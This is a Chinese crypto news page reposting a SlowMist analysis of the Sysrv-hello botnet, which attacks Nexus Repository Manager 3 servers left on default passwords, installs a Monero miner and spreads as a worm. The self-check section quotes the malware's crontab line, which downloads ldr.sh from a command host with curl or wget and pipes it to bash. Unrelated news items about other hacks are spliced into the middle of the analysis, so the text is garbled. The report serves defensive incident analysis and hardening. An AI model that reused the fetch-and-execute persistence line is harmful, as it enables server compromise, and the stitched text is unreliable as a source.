慢霧：技術拆解 Sysrv-hello 僵尸網絡入侵原理_TOR

攻擊路徑

Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊，Maven私服部署會用到NexusRepositoryManager3，由于Maven是個流行服務，所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。

當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時，Sysrv-hello就可以直接掃描入侵，利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。

慢霧：Uwerx遭受攻擊因為接收地址會多銷毀掉from地址轉賬金額1%的代幣:金色財經報道，Uwerx遭到攻擊，損失約174.78枚ETH，據慢霧分析，根本原因是當接收地址為 uniswapPoolAddress（0x01）時，將會多burn掉from地址的轉賬金額1%的代幣，因此攻擊者利用uniswapv2池的skim功能消耗大量WERX代幣，然后調用sync函數惡意抬高代幣價格，最后反向兌換手中剩余的WERX為ETH以獲得利潤。據MistTrack分析，黑客初始資金來自Tornadocash轉入的10 BNB，接著將10 BNB換成1.3 ETH，并通過Socket跨鏈到以太坊。目前，被盜資金仍停留在黑客地址0x605...Ce4。[2023/8/2 16:14:10]

入侵到服務器后會自動下載執行ldr.sh文件，該文件主要功能：1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦，文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴

慢霧：GenomesDAO被黑簡析:據慢霧區hacktivist消息，MATIC上@GenomesDAO項目遭受黑客攻擊，導致其LPSTAKING合約中資金被非預期的取出。慢霧安全團隊進行分析有以下原因：

1.由于GenomesDAO的LPSTAKING合約的initialized函數公開可調用且無權限與不可能重復初始化限制，攻擊者利用initialized函數將合約的stakingToken設置為攻擊者創建的虛假LP代幣。

2.隨后攻擊者通過stake函數進行虛假LP代幣的抵押操作，以獲得大量的LPSTAKING抵押憑證。

3.獲得憑證后再次通過initialized函數將合約的stakingToken設置為原先真是的LP代幣，隨后通過withdraw函數銷毀LPSTAKING憑證獲取合約中真實的LP抵押物。

4.最后將LP發送至DEX中移除流動性獲利。

本次事件是因為GenomesDAO的LPSTAKING合約可被任意重復初始化設置關鍵參數而導致合約中的抵押物被惡意耗盡。[2022/8/7 12:07:06]

第二個木馬sysrv的主要功能：1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播，隨機掃描其他IP服務，同樣進行NexusRepositoryManager3漏洞利用，同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務

慢霧：Let's Encrypt軟件Bug導致3月4日吊銷 300 萬個證書:Let's Encrypt由于在后端代碼中出現了一個錯誤，Let's Encrypt項目將在撤銷超過300萬個TLS證書。詳情是該錯誤影響了Boulder，Let's Encrypt項目使用該服務器軟件在發行TLS證書之前驗證用戶及其域。慢霧安全團隊提醒：數字貨幣行業有不少站點或內部系統為安全目的而使用 Let's Encrypt 自簽證書，請及時確認是否受到影響。如有影響請及時更新證書，以免造成不可預知的風險。用戶可查看原文鏈接在線驗證證書是否受到影響。[2020/3/4]

自查方法

進程：network01sysrv

文件：/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab：echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口：52013

存在以上這些，停止備份樣本后刪除。

加固建議

刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問，嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后，重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力，存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明：作為區塊鏈信息平臺，本站所發布文章僅代表作者個人觀點，與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考，并非作為或被視為實際投資建議。

本文來源于非小號媒體平臺：

慢霧科技

現已在非小號資訊平臺發布68篇作品，

非小號開放平臺歡迎幣圈作者入駐

入駐指南：

/apply_guide/

本文網址：

/news/9606255.html

免責聲明：

1.資訊內容不構成投資建議，投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有，僅代表作者本人觀點，不代表非小號的觀點或立場

上一篇：

深入解析MakeDao在新周期里的機遇和風險

Tags：TORRYMASTAREPtorn幣最新消息INSTAR幣REP價格

MANA